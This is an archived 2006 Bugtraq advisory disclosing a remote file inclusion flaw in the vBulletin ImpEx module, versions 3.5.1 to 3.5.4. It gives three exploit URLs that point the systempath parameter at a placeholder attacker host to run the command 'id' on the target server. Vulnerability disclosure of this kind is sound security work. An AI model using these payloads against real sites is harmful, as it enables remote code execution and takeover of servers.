lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060412140426.4399.qmail@securityfocus.com> Date: 12 Apr 2006 14:04:26 -0000 From: dr.jr7@...mail.com To: bugtraq@...urityfocus.com Subject: Remote File Inclusion in VBulletin ImpEx Remote File Inclusion in VBulletin ImpEx Date : 12 / 4 / 2006 Software : VBulletin ImpEx version : VBulletin 3.5.1 VBulletin 3.5.2 VBulletin 3.5.4 The bug reside in : ImpExModule.php ImpExController.php ImpExDisplay.php Exploit : (1) www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id (2) www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id (3) www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id Discovery by : Dr.Jr7 GreeTz : special greet to Qptan & Mr.SNAKE & trooq and to my all frinds in www.lezr.com/vb see u :}